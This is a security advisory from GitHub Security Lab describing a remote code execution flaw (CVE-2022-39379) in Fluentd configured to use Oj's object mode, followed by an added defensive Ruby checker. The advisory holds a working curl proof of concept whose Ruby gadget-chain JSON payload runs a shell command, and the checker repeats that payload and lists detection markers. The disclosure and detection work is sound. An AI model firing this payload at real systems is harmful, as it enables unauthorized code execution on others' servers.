Coordinated Disclosure Timeline
- 2022-10-05: Sent report to Fluentd maintainers
- 2022-10-05: Maintainers acknowledged receiving the report
- 2022-11-02: Advisory was published
Summary
A remote code execution (RCE) vulnerability in non-default configurations of Fluentd allowed unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.
Product
Fluentd
Tested Version
Details
Issue: Remote code execution due to insecure deserialization (in non-default configuration) (GHSL-2022-067)
Fluentd uses Oj as its JSON parser of choice if it is installed. Fluentd allows the JSON parsing mode of Oj to be configured and explicitly allows it to be set to object. When Oj.load is used in object mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data with any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.
Important: The default configuration of Fluentd is not vulnerable.
Proof of concept (for Ruby 2.x)
Requirements:
- Oj gem is installed on the system running Fluentd (Fluentd will then use Oj as its JSON parser of choice)
- Fluentd v1.13.2 or later is in use. The possibility to configure Oj via environment variables was introduced with v1.13.2.
- The FLUENT_OJ_OPTION_MODE environment variable is set to object (e.g., by executing export FLUENT_OJ_OPTION_MODE=object on the command line)
- Fluentd is configured to use a JSON parser (e.g., the config below starts a webserver to allow ingestion of logs via the HTTP interface):
<source>
@type http
@id http_input
<parse>
@type json
</parse>
port 8888
</source>
After we start Fluentd, it is possible to remotely attack it with the following deserialization gadget chain, which creates the file /tmp/pwned.txt on the attacked Fluentd system.
curl -X POST -d '{"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"any"},"debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":spawn"},"git_set":"touch /tmp/pwned.txt"},"method_id":":resolve"}}}}],"any"]}' http://localhost:8888/debug.test
Successful exploitation will result in the creation of a /tmp/pwned.txt file on the attacked Fluentd system.
(Note that the vulnerability can also be exploited by providing the above JSON-based log payload via other interfaces of Fluentd (e.g., via the console).)
Please note:
- The above payload for Ruby 2.x is based on a gadget chain for Marshal.load originally discovered by William Bowling aka vakzz.
- A payload for Oj.load such as the one above can be found in this blog post from Bishop Fox.
- We are in possession of an undisclosed Oj.load payload for Ruby 3.x that is based on the newest Marshal.load gadget chain from William Bowling.
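As an added example (not part of the original advisory and not code from Fluentd or Oj), the following Ruby script shows two pre-flight checks an operator can run on a host where the Oj gem is installed: it refuses the object mode that the FLUENT_OJ_OPTION_MODE environment variable would select, and it scans a JSON log payload for Oj object-mode type markers before the payload reaches a parser. The list of marker prefixes and the list of modes treated as safe are assumptions made for this example (the PoC payload above uses "^#", "^c" and "^o"); the sample payloads are constructed inline.

```ruby
require 'json'

# Added example, not code from Fluentd or Oj. Two pre-flight checks an
# operator can run before (re)starting Fluentd with Oj installed:
#   1. refuse the Oj "object" mode that FLUENT_OJ_OPTION_MODE would select, and
#   2. flag Oj object-mode type markers in a JSON log payload.
#
# Assumption: the marker keys below follow Oj's object-mode encoding.
# The proof-of-concept payload in the advisory uses three of them: "^#", "^c", "^o".
OJ_OBJECT_MARKERS = %w[^o ^c ^# ^u ^t ^i ^r].freeze

# Oj modes assumed here not to instantiate arbitrary classes on load;
# confirm against the Oj documentation for the version you run.
SAFE_OJ_MODES = %w[strict null compat json rails].freeze

# Constructed sample inputs: the PoC payload from the advisory and an
# ordinary log event.
SAMPLE_POC_PAYLOAD = '{"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},' \
  '{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader",' \
  '"io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry",' \
  '"read":0,"header":"any"},"debug_output":{"^o":"Net::WriteAdapter",' \
  '"socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter",' \
  '"socket":{"^c":"Kernel"},"method_id":":spawn"},"git_set":"touch /tmp/pwned.txt"},' \
  '"method_id":":resolve"}}}}],"any"]}'
SAMPLE_BENIGN_EVENT = '{"message":"user login","level":"info","user":"alice"}'

# Returns :ok when no mode or a listed safe mode is set,
# :object_mode_enabled for the vulnerable setting, :unlisted_mode otherwise.
# `env` defaults to ENV so the check runs in the shell that will start Fluentd.
def check_oj_mode(env = ENV)
  mode = env['FLUENT_OJ_OPTION_MODE']
  return :ok if mode.nil? || mode.empty?
  return :ok if SAFE_OJ_MODES.include?(mode)
  mode == 'object' ? :object_mode_enabled : :unlisted_mode
end

# Parses with the stdlib JSON parser (which does not build objects from
# type markers) and walks the result, collecting the two-character Oj
# marker prefix of every hash key such as "^o" or "^#1".
# Returns the sorted, de-duplicated markers; an empty array means none.
def oj_markers_in(json_text)
  found = []
  walk = lambda do |node|
    case node
    when Hash
      node.each do |key, value|
        prefix = key.is_a?(String) ? key[0, 2] : nil
        found << prefix if OJ_OBJECT_MARKERS.include?(prefix)
        walk.call(value)
      end
    when Array
      node.each { |value| walk.call(value) }
    end
  end
  walk.call(JSON.parse(json_text))
  found.uniq.sort
rescue JSON::ParserError
  [] # not JSON at all, so an object-mode parser has nothing to build
end

# True when a payload carries no Oj object-mode markers.
def plain_log_event?(json_text)
  oj_markers_in(json_text).empty?
end

if __FILE__ == $PROGRAM_NAME
  puts "FLUENT_OJ_OPTION_MODE check: #{check_oj_mode}"
  puts "PoC payload markers:         #{oj_markers_in(SAMPLE_POC_PAYLOAD).inspect}"
  puts "benign event markers:        #{oj_markers_in(SAMPLE_BENIGN_EVENT).inspect}"
end
```

The marker scan is a detection aid, not a substitute for the real mitigation: the page's own advice is to keep Fluentd out of Oj's object mode, and the mode check is the one that matters. Run the script in the same shell that will start Fluentd so it sees the same environment.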
Impact
This issue may lead to remote code execution (RCE) if vulnerable configurations are used.
CVE
- CVE-2022-39379
Credit
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-067 in any communication regarding this issue.